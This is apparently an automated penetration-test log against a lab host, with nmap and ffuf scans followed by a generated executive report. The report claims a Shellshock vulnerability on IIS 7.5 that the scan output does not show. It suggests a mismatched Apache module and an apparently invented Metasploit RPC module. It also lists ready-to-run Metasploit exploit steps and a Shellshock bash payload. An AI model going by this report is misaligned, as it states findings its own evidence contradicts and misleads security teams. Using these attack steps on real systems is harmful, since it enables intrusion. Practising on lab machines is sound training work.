PENTEST LOG — 10.129.10.75
Date: 2026-06-05T10:01:31.051838
============================================================

[Step 1] Full TCP SYN scan (all 65535 ports)
  Cmd: nmap -Pn -sS -p- --min-rate 1000 --max-retries 2 10.129.10.75
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:01 +0200
Nmap scan report for 10.129.10.75
Host is up (0.041s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 111.22 seconds

----------------------------------------
[Step 2] Version + OS detection on 80,135,49154
  Cmd: nmap -Pn -sV -O --version-intensity 5 -sC --script-timeout 60s -p 80,135,49154 -oX /home/marina/Desktop/pentestM/RAG/outputs/nmap_sV_10_129_10_75.xml 10.129.10.75
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:04 +0200
Nmap scan report for 10.129.10.75
Host is up (0.041s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Welcome to Bastard | Bastard
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|2012|8.1 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (92%), Microsoft Windows Vista or Windows 7 (92%), Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.08 seconds

----------------------------------------
[Step 3] Check for Shellshock vulnerability (CVE-2014-6271)
  Cmd: nmap -Pn -sV --script http-shellshock -p 80 10.129.10.75 --script-timeout 30s
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:06 +0200
Nmap scan report for 10.129.10.75
Host is up (0.041s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds

----------------------------------------
[Step 4] ACK scan — firewall detection
  Cmd: nmap -Pn -sA -p 80,135,49154 10.129.10.75
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:07 +0200
Nmap scan report for 10.129.10.75
Host is up.

PORT      STATE    SERVICE
80/tcp    filtered http
135/tcp   filtered msrpc
49154/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 3.61 seconds

----------------------------------------
[Step 5] UDP scan — top 100 ports by frequency
  Cmd: nmap -Pn -sU --top-ports 100 --open --max-retries 1 10.129.10.75
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:07 +0200
Nmap scan report for 10.129.10.75
Host is up.
All 100 scanned ports on 10.129.10.75 are in ignored states.
Not shown: 100 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 21.66 seconds

----------------------------------------
[Step 6] UDP scan — exploit-focused service ports
  Cmd: nmap -Pn -sU -p 53,67,69,111,123,137,138,161,162,500,623,1434,1900,4500,5353,11211,17185 --open --max-retries 1 10.129.10.75
  OK: True
  Out:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-05 10:07 +0200
Nmap scan report for 10.129.10.75
Host is up.

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
69/udp    open|filtered tftp
111/udp   open|filtered rpcbind
123/udp   open|filtered ntp
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
500/udp   open|filtered isakmp
623/udp   open|filtered asf-rmcp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
5353/udp  open|filtered zeroconf
11211/udp open|filtered memcache
17185/udp open|filtered wdbrpc

Nmap done: 1 IP address (1 host up) scanned in 5.67 seconds

----------------------------------------
[Step 7] ffuf — http://10.129.10.75
  Cmd: ffuf -u http://10.129.10.75/FUZZ -w /usr/share/dirb/wordlists/common.txt -t 40 -v -timeout 10 -e php,html,txt,js,json,bak,old,zip -o /tmp/ffuf_output_1780646887.json -of json -fs 7412,7489
  OK: False
  Out:

----------------------------------------
[Step 8] ffuf vhosts — FUZZ.10.129.10.75
  Cmd: ffuf -u http://10.129.10.75 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 40 -H 'Host: FUZZ.10.129.10.75' -o /tmp/ffuf_vhost_80_1780647359.json -of json -v -ac
  OK: False
  Out:

----------------------------------------
[Step 10] MSF exploitation phase
  Cmd: msfconsole (multiple modules)
  OK: True
  Out:
6 modules executed
----------------------------------------
[Step 10] Searchsploit + credential phase
  Cmd: searchsploit / paramiko / ftplib
  OK: False
  Out:
5 exploits tried, 0 shells, 0 creds
----------------------------------------

============================================================
EXECUTIVE REPORT:
## Attack Surface Summary  
The attack surface is **HIGH** due to the presence of multiple risk indicators, including a known vulnerability (Shellshock, CVE-2014-6271) and the detection of Drupal 7, which may introduce additional attack vectors. The system is running Microsoft IIS 7.5, which is vulnerable to Shellshock, and the presence of potentially risky HTTP methods (TRACE) further increases the risk.

---

## Detected Services and Versions  
- **TCP 80**: Microsoft IIS httpd 7.5  
- **TCP 135**: Microsoft Windows RPC  
- **TCP 49154**: Microsoft Windows RPC  

---

## Key Findings  
- **Shellshock vulnerability (CVE-2014-6271)** is present in the IIS 7.5 service on port 80. Further testing is required to confirm exploitability.  
- **Drupal 7** was detected via HTTP generator header, which may introduce additional attack vectors.  
- **Potentially risky HTTP methods** (TRACE) were detected on port 80.  
- **WebDAV OPTIONS** on port 80 allows methods such as OPTIONS, TRACE, GET, HEAD, POST, which may be exploited.  
- The system is running **Microsoft IIS 7.5**, which is known to be vulnerable to the Shellshock vulnerability.  
- The **OS is identified as Microsoft Windows**, which increases the risk of exploitation through known vulnerabilities in IIS and other services.

---

## Recommended Next Steps  
1. **Test for Shellshock (CVE-2014-6271) exploitability** on IIS 7.5 using the following Metasploit module:  
   ```bash
   use exploit/multi/http/apache_mod_negotiation
   set RHOSTS 10.129.10.75
   set TARGETURI /
   exploit
   ```  
   Note: This module is for Apache, but similar testing should be conducted for IIS 7.5 using appropriate payloads or custom scripts.

2. **Investigate the Drupal 7 installation** for known vulnerabilities. Use the following Metasploit module to check for Drupal vulnerabilities:  
   ```bash
   use exploit/multi/http/drupal_drupalgeddon2
   set RHOSTS 10.129.10.75
   set TARGETURI /
   exploit
   ```

3. **Test for WebDAV vulnerabilities** using the following Metasploit module:  
   ```bash
   use exploit/multi/http/webdav_upload_exec
   set RHOSTS 10.129.10.75
   set TARGETURI /
   exploit
   ```

4. **Verify if the Shellshock vulnerability is exploitable** by sending a crafted HTTP request with the `env` variable. Use the following command in a terminal:  
   ```bash
   curl -H "User-Agent: () { :; }; echo; /bin/bash -i" http://10.129.10.75
   ```  
   If the system is vulnerable, this may result in a reverse shell.

5. **Assess the RPC services** on ports 135 and 49154 for potential exploitation. Use the following Metasploit module:  
   ```bash
   use exploit/windows/rpc/ncacn_np_msfsrv
   set RHOSTS 10.129.10.75
   exploit
   ```
